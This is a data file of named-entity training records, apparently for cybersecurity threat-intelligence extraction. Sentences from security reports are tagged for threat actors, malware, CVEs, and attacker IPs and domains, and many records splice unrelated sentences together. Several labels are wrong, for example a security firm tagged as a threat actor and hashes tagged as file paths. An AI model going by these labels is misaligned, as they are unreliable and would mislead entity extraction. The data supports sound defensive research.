{"text": "If the value of this field failed to arrive from the C & C , it was selected from the file data.db using a pseudo-random algorithm . Trend Micro endpoint solutions such as Trend Micro™ Smart Protection Suites and Worry-Free™ Business Security can protect users and businesses from these threats by detecting malicious files and spammed messages as well as blocking all related malicious URLs . These and other tools used by the Lazarus group can be mitigated by routinely scanning the network for any malicious activity to help prevent the malware from entering and spreading through an organization .", "spans": {"ORGANIZATION: Trend Micro": [[133, 144]], "ORGANIZATION: Trend Micro™ Smart Protection Suites": [[172, 208]], "ORGANIZATION: Worry-Free™ Business Security": [[213, 242]], "ORGANIZATION: businesses": [[265, 275]], "MALWARE: malicious files": [[308, 323]], "THREAT_ACTOR: Lazarus group": [[428, 441]]}, "info": {"id": "cyberner_stix_train_002081", "source": "cyberner_stix_train"}}
{"text": "Dragos identified several compromises of ICS vendors and manufacturers in 2018 by activity associated with XENOTIME , providing potential supply chain threat opportunities and vendor-enabled access to asset owner and operator ICS networks .", "spans": {"ORGANIZATION: Dragos": [[0, 6]], "TOOL: ICS": [[41, 44], [226, 229]], "THREAT_ACTOR: XENOTIME": [[107, 115]]}, "info": {"id": "cyberner_stix_train_002082", "source": "cyberner_stix_train"}}
{"text": "We have also observed and notified STRONTIUM attacks against Olympic organizing committees , anti-doping agencies , and the hospitality industry .", "spans": {"THREAT_ACTOR: STRONTIUM": [[35, 44]], "ORGANIZATION: Olympic": [[61, 68]]}, "info": {"id": "cyberner_stix_train_002083", "source": "cyberner_stix_train"}}
{"text": "Variants of malware and tools used by HIDDEN COBRA actors include Destover , Wild Positron E-MAL/Duuzer , and Hangman .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[38, 50]], "MALWARE: Destover": [[66, 74]], "MALWARE: Wild": [[77, 81]], "MALWARE: Positron E-MAL/Duuzer": [[82, 103]], "MALWARE: Hangman": [[110, 117]]}, "info": {"id": "cyberner_stix_train_002084", "source": "cyberner_stix_train"}}
{"text": "Based on information gained from discussion with the initial TRITON / TRISIS responders and subsequent work on follow-on activity by this entity , Dragos developed a comprehensive ( public ) picture of adversary activity roughly matching FireEye ’s analysis published in April 2019 , described in various media .", "spans": {"MALWARE: TRITON": [[61, 67]], "MALWARE: TRISIS": [[70, 76]], "ORGANIZATION: Dragos": [[147, 153]], "ORGANIZATION: FireEye": [[238, 245]]}, "info": {"id": "cyberner_stix_train_002085", "source": "cyberner_stix_train"}}
{"text": "In some of the latest samples of BalkanDoor detected in 2019 , the malware is distributed as an ACE archive , disguised as a RAR archive (i.e , not an executable file) , specially crafted to exploit the WinRAR ACE vulnerability CVE-2018-20250 . Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal here using http://voguextra.com/decoy.doc .", "spans": {"MALWARE: BalkanDoor": [[33, 43]], "VULNERABILITY: CVE-2018-20250": [[228, 242]], "ORGANIZATION: Bellingcat": [[245, 255]], "FILEPATH: decoy documents": [[324, 339]], "TOOL: VirusTotal": [[355, 365]], "FILEPATH: http://voguextra.com/decoy.doc": [[377, 407]]}, "info": {"id": "cyberner_stix_train_002086", "source": "cyberner_stix_train"}}
{"text": "Unit 42 tracks the toolkits delivering FakeM under the names MNKit , WingD and Tran Duy Linh . Gallmaker 's targets are embassies of an Eastern European country .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: FakeM": [[39, 44]], "TOOL: MNKit": [[61, 66]], "TOOL: WingD": [[69, 74]], "TOOL: Tran Duy Linh": [[79, 92]], "THREAT_ACTOR: Gallmaker": [[95, 104]], "ORGANIZATION: embassies": [[120, 129]]}, "info": {"id": "cyberner_stix_train_002087", "source": "cyberner_stix_train"}}
{"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . The Lamberts toolkit spans across several years , with most activity occurring in 2013 and 2014 .", "spans": {"ORGANIZATION: security firm": [[17, 30]], "VULNERABILITY: Adobe Reader vulnerability": [[153, 179]], "MALWARE: Lamberts toolkit": [[186, 202]]}, "info": {"id": "cyberner_stix_train_002088", "source": "cyberner_stix_train"}}
{"text": "This particular strain of Adware was found in 206 applications , and the combined download count has reached almost 150 million . Since at least the beginning of 2014 , APT38 operations have focused almost exclusively on developing and conducting financially motivated campaigns targeting international entities , whereas TEMP.Hermit is generally linked to operations focused on South Korea and the United States . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": {"THREAT_ACTOR: APT38": [[169, 174]], "ORGANIZATION: international entities": [[289, 311]], "THREAT_ACTOR: TEMP.Hermit": [[322, 333]], "FILEPATH: Backdoor.Nidiran": [[524, 540]]}, "info": {"id": "cyberner_stix_train_002089", "source": "cyberner_stix_train"}}
{"text": "The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . Madi was found capturing computer screens , recording audio and stealing screenshots , keystrokes , documents and e-mail correspondence from \" Middle Eastern critical infrastructure engineering firms , government agencies , financial houses and academia .", "spans": {"MALWARE: documents": [[4, 13]], "VULNERABILITY: CVE-2012-0158": [[97, 110]], "VULNERABILITY: Microsoft Word vulnerabilities": [[166, 196]], "TOOL: e-mail": [[355, 361]], "ORGANIZATION: critical infrastructure engineering firms": [[399, 440]], "ORGANIZATION: government agencies": [[443, 462]], "ORGANIZATION: financial houses": [[465, 481]], "ORGANIZATION: academia": [[486, 494]]}, "info": {"id": "cyberner_stix_train_002090", "source": "cyberner_stix_train"}}
{"text": "In July of 2015 , we identified a full e-mail uploaded to an antivirus scanning service that carried a Scarlet Mimic exploit document . In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed .", "spans": {"VULNERABILITY: Scarlet Mimic exploit": [[103, 124]], "ORGANIZATION: Wikileaks": [[152, 161]], "VULNERABILITY: exploit": [[189, 196]], "MALWARE: Mikrotik": [[207, 215]], "MALWARE: ChimayRed": [[223, 232]]}, "info": {"id": "cyberner_stix_train_002091", "source": "cyberner_stix_train"}}
{"text": "From the emails ( and the attachments ) it looks like the goal of the attackers was to infect and take control of the systems and also to spy on the actions of the Indian Government post the Jammu & Kashmir protest and Uri Terror attack .", "spans": {"TOOL: emails": [[9, 15]]}, "info": {"id": "cyberner_stix_train_002092", "source": "cyberner_stix_train"}}
{"text": "CTU researchers recommend the following practices to prevent or detect TG-3390 intrusions :", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[71, 78]]}, "info": {"id": "cyberner_stix_train_002093", "source": "cyberner_stix_train"}}
{"text": "Ploutus-D will load KXCashDispenserLib” library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) . Our research indicates that it has started targeting Japanese users .", "spans": {"MALWARE: Ploutus-D": [[0, 9]], "ORGANIZATION: Japanese users": [[231, 245]]}, "info": {"id": "cyberner_stix_train_002094", "source": "cyberner_stix_train"}}
{"text": "The article describes the malicious document and the Seduploader reconnaissance malware , especially the difference with the previous versions .", "spans": {"MALWARE: Seduploader": [[53, 64]]}, "info": {"id": "cyberner_stix_train_002095", "source": "cyberner_stix_train"}}
{"text": "In May 2016 , two apparently unrelated activity groups , PROMETHIUM and NEODYMIUM , conducted attack campaigns in Europe that used the same zeroday exploit while the vulnerability was publicly unknown . The subject is a series of targeted attacks against private companies .", "spans": {"THREAT_ACTOR: activity groups": [[39, 54]], "THREAT_ACTOR: PROMETHIUM": [[57, 67]], "THREAT_ACTOR: NEODYMIUM": [[72, 81]], "VULNERABILITY: zeroday exploit": [[140, 155]], "ORGANIZATION: private companies": [[255, 272]]}, "info": {"id": "cyberner_stix_train_002096", "source": "cyberner_stix_train"}}
{"text": "The open source and several other samples we found give a dynamically-assigned 1 byte ID at compile time .", "spans": {}, "info": {"id": "cyberner_stix_train_002097", "source": "cyberner_stix_train"}}
{"text": "As is characteristic for obfuscated threats , the malware has encrypted binary code stored in the Assets folder : When the malware runs for the first time , the static block of the main class is run . MyWeb is the second-generation malware used by Ke3chang . Furthermore, the email address used in Reply-To is from a free email client . This new ransomware variant does n't have any novel features or functionality and points to the challenges organizations are facing as the landscape continues to shift and a plethora of new actors join their ranks .", "spans": {"TOOL: MyWeb": [[201, 206]], "THREAT_ACTOR: Ke3chang": [[248, 256]], "TOOL: email": [[276, 281], [322, 327]]}, "info": {"id": "cyberner_stix_train_002098", "source": "cyberner_stix_train"}}
{"text": "The BokBot malware provides LUNAR SPIDER affiliates with a variety of capabilities to enable credential theft and wire fraud , through the use of webinjects and a malware distribution function . They tried new techniques to steal from banking systems , including AWS CBR ( the Russian Central Bank 's Automated Workstation Client ) , ATMs , and card processing .", "spans": {"TOOL: BokBot malware": [[4, 18]], "ORGANIZATION: Central Bank 's Automated Workstation Client": [[285, 329]], "ORGANIZATION: ATMs": [[334, 338]]}, "info": {"id": "cyberner_stix_train_002099", "source": "cyberner_stix_train"}}
{"text": "It 's often hard for average users to know if their phones have been rooted , and Shedun apps often wait some period of time before displaying obtrusive ads or installing apps . The campaign 's use of an SMB worm to distribute WCry contributed to the ransomware 's virulence . APT33 : 64.251.19.216 [REDACTED].myftp.biz . Considering that both Royal and BlackSuit were active last month , however , a rebrand probably is n’t happening any time soon .", "spans": {"MALWARE: Shedun": [[82, 88]], "TOOL: SMB worm": [[204, 212]], "TOOL: WCry": [[227, 231]], "THREAT_ACTOR: APT33": [[277, 282]], "IP_ADDRESS: 64.251.19.216": [[285, 298]], "DOMAIN: [REDACTED].myftp.biz": [[299, 319]], "MALWARE: Royal": [[344, 349]], "MALWARE: BlackSuit": [[354, 363]]}, "info": {"id": "cyberner_stix_train_002100", "source": "cyberner_stix_train"}}
{"text": "Then , a request is formed in such a way that an activity that installs the application is called , bypassing all security checks . The infection vector is similar , it uses a similar modified mimikatz application , and it uses a third-party remote access tool , changes system settings to allow concurrent RDP sessions , and so on . The decryption process involves ADD and XOR operations , using a key hardcoded in the binary . We should note that SocGholish used to retrieve media files from separate web requests until more recently when it started using self - contained Base64 encoded images .", "spans": {"TOOL: mimikatz": [[193, 201]], "TOOL: third-party remote access tool": [[230, 260]], "TOOL: RDP": [[307, 310]]}, "info": {"id": "cyberner_stix_train_002101", "source": "cyberner_stix_train"}}
{"text": "In this case we found traces of dx/dexmerge compilers , which means that , this time , the attackers just imported the original source code into an Android IDE ( such as Android Studio , for instance ) and compiled it with their own modifications . When Buhtrap was targeting businesses , the decoy documents would typically be contracts or invoices . Members from our team have already presented on the conflict of these two threat actors at security conferences .", "spans": {"SYSTEM: Android": [[148, 155]], "SYSTEM: Android Studio": [[170, 184]], "THREAT_ACTOR: Buhtrap": [[254, 261]], "ORGANIZATION: businesses": [[276, 286]]}, "info": {"id": "cyberner_stix_train_002102", "source": "cyberner_stix_train"}}
{"text": "Hopefully this analysis has been helpful in understanding how truly connected some of these infrastructures can be and how with a little digging , you can uncover a substantial amount of operationally useful indicators to protect you and yours .", "spans": {}, "info": {"id": "cyberner_stix_train_002103", "source": "cyberner_stix_train"}}
{"text": "In some versions of Asacub , strings in the app are encrypted using the same algorithm as data sent to C & C , but with different keys . Within six hours of entering the environment , the threat actors compromised multiple systems and stole credentials for the entire domain . Collection of results and data from scanning in this manner might be easier to sort ( while allowing them to stay under the radar ) , as compared to getting feedback from zombie bots deployed around the world simultaneously . That Budworm continues to use a known malware SysUpdate , alongside techniques it is known to favor , such as DLL sideloading using an application it has used for this purpose before , indicate that the group is nt too concerned about having this activity associated with it if it is discovered .", "spans": {"MALWARE: Asacub": [[20, 26]], "THREAT_ACTOR: Budworm": [[508, 515]], "MALWARE: malware SysUpdate": [[541, 558]], "THREAT_ACTOR: group": [[706, 711]]}, "info": {"id": "cyberner_stix_train_002104", "source": "cyberner_stix_train"}}
{"text": "At execution , it installs an application-defined Windows hook .", "spans": {"SYSTEM: Windows": [[50, 57]]}, "info": {"id": "cyberner_stix_train_002105", "source": "cyberner_stix_train"}}
{"text": "It will appear differently to users depending on the language set on the device . They were also behind an attack on the World Anti-Doping Agency (WADA) , in which they leaked confidential information about several drug tests . “ winserv.exe ” file .", "spans": {"THREAT_ACTOR: They": [[82, 86]], "ORGANIZATION: (WADA)": [[146, 152]], "FILEPATH: winserv.exe": [[230, 241]]}, "info": {"id": "cyberner_stix_train_002106", "source": "cyberner_stix_train"}}
{"text": "Many hacktools are made for less than ethical purposes and are freely available , so this was an initial red flag , which led us to investigate further .", "spans": {}, "info": {"id": "cyberner_stix_train_002107", "source": "cyberner_stix_train"}}
{"text": "Armed with this code , we removed this first layer of anti-analysis protection . On November 10 , 2015 , Lotus Blossom sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs . Once the service runs , it appends the extension .mui to its DLL path , reads that file and decrypts it using RC5 . In one particular forum post , Hack520 mentions that he was previously jailed for a period of 10 months in a blog post dated May 31 , 2009 .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[105, 118]], "ORGANIZATION: individual": [[153, 163]], "TOOL: DLL": [[269, 272]], "TOOL: RC5": [[318, 321]], "THREAT_ACTOR: Hack520": [[355, 362]]}, "info": {"id": "cyberner_stix_train_002108", "source": "cyberner_stix_train"}}
{"text": "Collection T1417 Input Capture Records user input data . In the case of the attack against the Middle Eastern target , Crambus was the first group to compromise the victim’s network , with the earliest evidence of activity dating to November 2017 . Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years .", "spans": {"THREAT_ACTOR: Crambus": [[119, 126]], "ORGANIZATION: Talos": [[249, 254]], "MALWARE: Remote Administration Tool": [[281, 307]]}, "info": {"id": "cyberner_stix_train_002109", "source": "cyberner_stix_train"}}
{"text": "Instead of using fake Google Docs phishing pages to collect personal email login credentials , Scattered Canary began using phishing pages of commonly used business applications to compromise enterprise credentials . Versions of this particular orchestrator were found on other victims , together with White Lambert samples , indicating a close relationship between the White and Pink Lambert malware families .", "spans": {"THREAT_ACTOR: Scattered Canary": [[95, 111]], "MALWARE: White Lambert samples": [[302, 323]], "MALWARE: White": [[370, 375]], "MALWARE: Pink Lambert malware families": [[380, 409]]}, "info": {"id": "cyberner_stix_train_002110", "source": "cyberner_stix_train"}}
{"text": "The PassCV group continues to be extremely effective in compromising both small and large game companies and surreptitiously using their code-signing certificates to infect an even larger swath of organizations . Since that analysis , CTU researchers have observed multiple BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives .", "spans": {"THREAT_ACTOR: PassCV": [[4, 10]], "ORGANIZATION: game companies": [[90, 104]], "ORGANIZATION: CTU": [[235, 238]]}, "info": {"id": "cyberner_stix_train_002111", "source": "cyberner_stix_train"}}
{"text": "While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular Japanese product used to manage an organization . t's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost .", "spans": {"ORGANIZATION: Secureworks": [[39, 50]], "THREAT_ACTOR: BRONZE BUTLER": [[62, 75]], "VULNERABILITY: CVE-2016-7836": [[142, 155]], "MALWARE: DNS-based attack technique": [[267, 293]], "ORGANIZATION: Arbor 's ASERT Team": [[424, 443]]}, "info": {"id": "cyberner_stix_train_002112", "source": "cyberner_stix_train"}}
{"text": "ORat malware sample : a0758535cf8eb689782b95d3791d23d5 , 774a9c3ff01a3e734b7bec0c312120126295fad9 , 2e8762c984468ee309dad30a6c5f6d3308676ac721357da442a8a5b9d9d65d82 .", "spans": {"MALWARE: ORat": [[0, 4]], "FILEPATH: a0758535cf8eb689782b95d3791d23d5": [[22, 54]], "FILEPATH: 774a9c3ff01a3e734b7bec0c312120126295fad9": [[57, 97]], "FILEPATH: 2e8762c984468ee309dad30a6c5f6d3308676ac721357da442a8a5b9d9d65d82": [[100, 164]]}, "info": {"id": "cyberner_stix_train_002113", "source": "cyberner_stix_train"}}
{"text": "In the screenshots below , Windows Defender ATP clearly presents the Winnti installation where an installer drops a DLL to disk , loads the DLL using rundll32 , sets the DLL as a service , and saves a copy of itself in C:\\Windows\\Help .", "spans": {"TOOL: Windows Defender ATP": [[27, 47]], "TOOL: DLL": [[116, 119], [140, 143], [170, 173]]}, "info": {"id": "cyberner_stix_train_002114", "source": "cyberner_stix_train"}}
{"text": "The new SOL protocol within the PLATINUM file-transfer tool makes use of the AMT Technology SDK 's Redirection Library API ( imrsdk.dll ) . Secondly , when the emails were being sent to a broad set of recipients , the mails purported to be a necessary security update .", "spans": {"THREAT_ACTOR: PLATINUM": [[32, 40]], "TOOL: AMT Technology SDK": [[77, 95]], "TOOL: Redirection Library API": [[99, 122]], "MALWARE: imrsdk.dll": [[125, 135]], "TOOL: emails": [[160, 166]]}, "info": {"id": "cyberner_stix_train_002115", "source": "cyberner_stix_train"}}
{"text": "Both init and init2 scripts make sure all other running mining services are killed , and that all the files in the working directory are executed by giving 777 permissions .", "spans": {}, "info": {"id": "cyberner_stix_train_002116", "source": "cyberner_stix_train"}}
{"text": "PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts . This suggests to us that Thrip 's motives go beyond spying and may also include disruption .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "VULNERABILITY: zero-day exploits": [[43, 60]]}, "info": {"id": "cyberner_stix_train_002117", "source": "cyberner_stix_train"}}
{"text": "Files Description CMDS * .txt Text files with commands to execute supersu.apk SuperSU ( eu.chainfire.supersu , https : //play.google.com/store/apps/details ? Working with U.S. Government partners , DHS and FBI identified Trojan malware variants used by the North Korean government - referred to by the U.S. Government as BADCALL . APT33 : 213.252.244.14 service-avant.com . Individuals who have access to critical information or systems can easily choose to misuse that accessto the detriment of their organization .", "spans": {"ORGANIZATION: U.S. Government": [[171, 186], [302, 317]], "ORGANIZATION: DHS": [[198, 201]], "ORGANIZATION: FBI": [[206, 209]], "TOOL: Trojan malware": [[221, 235]], "THREAT_ACTOR: APT33": [[331, 336]], "IP_ADDRESS: 213.252.244.14": [[339, 353]], "DOMAIN: service-avant.com": [[354, 371]]}, "info": {"id": "cyberner_stix_train_002118", "source": "cyberner_stix_train"}}
{"text": "Afterwards , they establish phishing sites on these domains that spoof the look and feel of the victim ’s web-based email services in order to steal their credentials .", "spans": {"TOOL: email": [[116, 121]]}, "info": {"id": "cyberner_stix_train_002119", "source": "cyberner_stix_train"}}
{"text": "In several cases , the Cobalt compromised company infrastructure and employee accounts in order to send phishing messages to partner companies in North and South America , Europe , CIS countries , and Central and Southeast Asia . By pivoting off the registration details and servers data of the two domains we discovered others registered by the threat agent .", "spans": {"THREAT_ACTOR: Cobalt": [[23, 29]]}, "info": {"id": "cyberner_stix_train_002120", "source": "cyberner_stix_train"}}
{"text": "This matches our observations of C2 servers as shown in Figure 7 . However , the attack on January 16 did not involve ThreeDollars at all . Indeed , some VMs do not have serial numbers and the macro is executed only if a serial number exists . Ashley Madison ’s parent company — Toronto - based Avid Life Media — filed a trademark infringement complaint in 2010 that succeeded in revealing a man named Dennis Bradshaw as the owner .", "spans": {"TOOL: ThreeDollars": [[118, 130]], "TOOL: VMs": [[154, 157]], "ORGANIZATION: Ashley Madison": [[244, 258]], "ORGANIZATION: Avid Life Media": [[295, 310]], "ORGANIZATION: Dennis Bradshaw": [[402, 417]]}, "info": {"id": "cyberner_stix_train_002121", "source": "cyberner_stix_train"}}
{"text": "From there , infected phones display illegitimate ads and install fraudulent apps after certain events , such as rebooting , the screen turning on or off , a detection that the user is present , or a change in Internet connectivity . WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data . APT33 : 64.251.19.232 mynetwork.ddns.net . They also list nebiltech[.]shop in their IOCs which is a domain we sometimes saw injected near the Google Tag Manager script , but not within it .", "spans": {"TOOL: WannaCry": [[234, 242]], "MALWARE: .WCRY": [[281, 286]], "THREAT_ACTOR: APT33": [[404, 409]], "IP_ADDRESS: 64.251.19.232": [[412, 425]], "DOMAIN: mynetwork.ddns.net": [[426, 444]], "MALWARE: Google Tag Manager script": [[546, 571]]}, "info": {"id": "cyberner_stix_train_002122", "source": "cyberner_stix_train"}}
{"text": "We found two functions : The first function is http : //s.psserviceonline [ . Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . The DNSMessenger malware is a shared tool , used by FIN7 , MuddyWater and perhaps other groups .", "spans": {"ORGANIZATION: Kaspersky": [[78, 87]], "THREAT_ACTOR: BlackOasis group": [[98, 114]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[132, 173]], "VULNERABILITY: CVE-2016-4117": [[176, 189]], "TOOL: FinSpy": [[236, 242]], "MALWARE: DNSMessenger": [[307, 319]], "MALWARE: malware": [[320, 327]], "THREAT_ACTOR: FIN7": [[355, 359]], "THREAT_ACTOR: MuddyWater": [[362, 372]], "THREAT_ACTOR: groups": [[391, 397]]}, "info": {"id": "cyberner_stix_train_002123", "source": "cyberner_stix_train"}}
{"text": "Targets The initial version of Ginp had a generic credit card grabber overlay screen used for all targeted applications . In September 2018 , one of our clients (and a supplier as well) , Visma , reached out to us for assistance in investigating an incident uncovered on their network following a breach notification by Rapid7 . The author of the NamelessHdoor appears to have created additional versions of the Nameless Backdoor by removing unnecessary functions , and added open-source DLL injection code from ReflectiveDLLLoader .", "spans": {"MALWARE: Ginp": [[31, 35]], "THREAT_ACTOR: Rapid7": [[320, 326]], "MALWARE: the NamelessHdoor": [[343, 360]], "MALWARE: Nameless Backdoor": [[412, 429]], "TOOL: DLL": [[488, 491]], "TOOL: ReflectiveDLLLoader": [[512, 531]]}, "info": {"id": "cyberner_stix_train_002124", "source": "cyberner_stix_train"}}
{"text": "This was the case in two known intrusions in 2015 , where attackers named the implant DLL “ ASPNET_FILTER.DLL ” to disguise it as the DLL for the ASP.NET ISAPI Filter .", "spans": {"TOOL: DLL": [[86, 89], [134, 137]], "FILEPATH: ASPNET_FILTER.DLL": [[92, 109]], "FILEPATH: ASP.NET": [[146, 153]]}, "info": {"id": "cyberner_stix_train_002125", "source": "cyberner_stix_train"}}
{"text": "The campaign , which we refer to as Operation Cloud Hopper , has targeted managed IT service providers ( MSPs ) , allowing APT10 unprecedented potential access to the intellectual property and sensitive data of those MSPs and their clients globally . In December 2017 , FireEye publicly released our first analysis on the TRITON attack where malicious actors used the TRITON custom attack framework to manipulate industrial safety systems at a critical infrastructure facility and inadvertently caused a process shutdown .", "spans": {"ORGANIZATION: managed IT service providers": [[74, 102]], "ORGANIZATION: MSPs": [[105, 109], [217, 221]], "THREAT_ACTOR: APT10": [[123, 128]], "ORGANIZATION: FireEye": [[270, 277]], "MALWARE: TRITON": [[368, 374]]}, "info": {"id": "cyberner_stix_train_002126", "source": "cyberner_stix_train"}}
{"text": "This is a common trick played by malware developers , making the user think the app may have been removed . In November 2018 , Silence tried their hand at targeting the Asian market for the first time in their history . These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider .", "spans": {"THREAT_ACTOR: Silence": [[127, 134]], "ORGANIZATION: Asian market": [[169, 181]], "THREAT_ACTOR: criminal groups": [[248, 263]], "THREAT_ACTOR: PoSeidon": [[324, 332]], "MALWARE: Carbanak": [[368, 376]], "THREAT_ACTOR: criminal organization": [[394, 415]], "THREAT_ACTOR: Carbon Spider": [[428, 441]]}, "info": {"id": "cyberner_stix_train_002127", "source": "cyberner_stix_train"}}
{"text": "Second Phase The second phase dex file contains 3 main services that are being used : • ConnManager - handles connections to the C & C • ReceiverManager - waits for incoming calls / app installations • TaskManager - manages the data collection tasks The C & C server address is different than the one that is used by the first phase , so the app reconnects to the new server as well as starts the periodic data collector tasks . APT33 's targeting of organizations involved in aerospace and energy most closely aligns with nation-state interests , implying that the threat actor is most likely government sponsored . For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS ) mechanism to communicate with the C2 over . Notably , the main function contains logic flaws that cause it to only be able to connect to an MSSQL server and upload ( LIGHTWORK ) to it , before immediately attempting to clean itself up .", "spans": {"THREAT_ACTOR: APT33": [[429, 434]], "ORGANIZATION: aerospace": [[477, 486]], "ORGANIZATION: energy": [[491, 497]], "THREAT_ACTOR: threat actor": [[566, 578]], "TOOL: C2": [[643, 645], [781, 783]], "MALWARE: Remexi": [[673, 679]], "TOOL: Microsoft Background Intelligent Transfer Service": [[689, 738]], "TOOL: (BITS": [[739, 744]]}, "info": {"id": "cyberner_stix_train_002128", "source": "cyberner_stix_train"}}
{"text": "The campaign we observed used four stages of PowerShell scripts without writing the the payloads to individual files .", "spans": {"TOOL: four stages of PowerShell scripts": [[30, 63]]}, "info": {"id": "cyberner_stix_train_002129", "source": "cyberner_stix_train"}}
{"text": "It turns out that those smaller Trojans face serious problems trying to get root access on Android 4.4.4 and above , because a lot of vulnerabilities were patched in these versions . These include CVE-2010-3962 as part of an attack campaign in 2010 and CVE-2014-1776 in 2014 . In July 2017 , we observed APT34 targeting a Middle East organization using a PowerShell-based backdoor that we call POWRUNER and a downloader with domain generation algorithm functionality that we call BONDUPDATER , based on strings within the malware .", "spans": {"SYSTEM: Android 4.4.4": [[91, 104]], "VULNERABILITY: CVE-2010-3962": [[197, 210]], "VULNERABILITY: CVE-2014-1776": [[253, 266]], "THREAT_ACTOR: APT34": [[304, 309]], "MALWARE: PowerShell-based backdoor": [[355, 380]], "MALWARE: POWRUNER": [[394, 402]], "MALWARE: BONDUPDATER": [[480, 491]]}, "info": {"id": "cyberner_stix_train_002130", "source": "cyberner_stix_train"}}
{"text": "CTU researchers divided the threat intelligence about TG-3390 into two sections : strategic and tactical .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: TG-3390": [[54, 61]]}, "info": {"id": "cyberner_stix_train_002131", "source": "cyberner_stix_train"}}
{"text": "Icons used for EventBot masqueraded as legitimate with these icons.application . We also discovered an interesting piece of rare malware created by this threat actor – a Bluetooth device harvester . Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure .", "spans": {"MALWARE: EventBot": [[15, 23]], "TOOL: malware": [[129, 136]], "MALWARE: Bluetooth device harvester": [[170, 196]], "ORGANIZATION: French diplomat": [[233, 248]], "THREAT_ACTOR: actors": [[314, 320]]}, "info": {"id": "cyberner_stix_train_002132", "source": "cyberner_stix_train"}}
{"text": "com.circle.android com.coinbase.android com.walmart.android com.bestbuy.android com.ebay.gumtree.au com.ebay.mobile com.westernunion.android.mtapp com.moneybookers.skrillpayments com.gyft.android com.amazon.mShop.android.shopping com.comarch.mobile.banking.bgzbnpparibas.biznes pl.bnpbgzparibas.firmapp com.finanteq.finance.bgz pl.upaid.bgzbnpp NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird . Starting from those findings , Cybaze-Yoroi ZLab team decided to deep dive into a technical analysis of the latest Pterodo implant . In addition , Hack520 ’s tweets always show photos of the same animal , which is likely his pet pig .", "spans": {"THREAT_ACTOR: NEODYMIUM": [[345, 354]], "THREAT_ACTOR: activity group": [[361, 375]], "ORGANIZATION: Microsoft": [[428, 437]], "TOOL: Wingbird": [[441, 449]], "ORGANIZATION: Cybaze-Yoroi ZLab team": [[482, 504]], "MALWARE: Pterodo": [[566, 573]]}, "info": {"id": "cyberner_stix_train_002133", "source": "cyberner_stix_train"}}
{"text": "THE DUKES 7 YEARS OF RUSSIAN CYBER ESPIONAGE .", "spans": {"THREAT_ACTOR: DUKES": [[4, 9]]}, "info": {"id": "cyberner_stix_train_002134", "source": "cyberner_stix_train"}}
{"text": "Extract current GPS coordinates of the phone . The threat actor behind ProjectSauron commands a top-of-the-top modular cyber-espionage platform in terms of technical sophistication , designed to enable long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods . As soon as the victim double-clicks on the dropper , they are presented with the decoy document . We highly suspect the “ Pig network ” to have also been used as a bulletproof hosting service for cybercriminals who are unrelated to the Winnti group .", "spans": {"TOOL: ProjectSauron": [[71, 84]], "SYSTEM: Pig network": [[426, 437]], "SYSTEM: bulletproof hosting service": [[468, 495]], "THREAT_ACTOR: Winnti group": [[540, 552]]}, "info": {"id": "cyberner_stix_train_002135", "source": "cyberner_stix_train"}}
{"text": "Table 3 ( above ) summarizes the commands supported by the variants used in the attack against Ukrainian government organizations . In addition to focused targeting of the private sector with ties to Vietnam , APT32 has also targeted foreign governments , as well as Vietnamese dissidents and journalists since at least 2013 .", "spans": {"ORGANIZATION: government organizations": [[105, 129]], "THREAT_ACTOR: APT32": [[210, 215]], "ORGANIZATION: governments": [[242, 253]], "ORGANIZATION: dissidents": [[278, 288]], "ORGANIZATION: journalists": [[293, 304]]}, "info": {"id": "cyberner_stix_train_002136", "source": "cyberner_stix_train"}}
{"text": "spear phishing : analytics-google.org .", "spans": {"URL: analytics-google.org": [[17, 37]]}, "info": {"id": "cyberner_stix_train_002137", "source": "cyberner_stix_train"}}
{"text": "Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . the United Kingdom had data stolen by members of Emissary Panda .", "spans": {"THREAT_ACTOR: Patchwork": [[10, 19]], "MALWARE: MS PowerPoint document": [[28, 50]], "VULNERABILITY: CVE-2014-6352": [[76, 89]], "THREAT_ACTOR: Emissary Panda": [[141, 155]]}, "info": {"id": "cyberner_stix_train_002138", "source": "cyberner_stix_train"}}
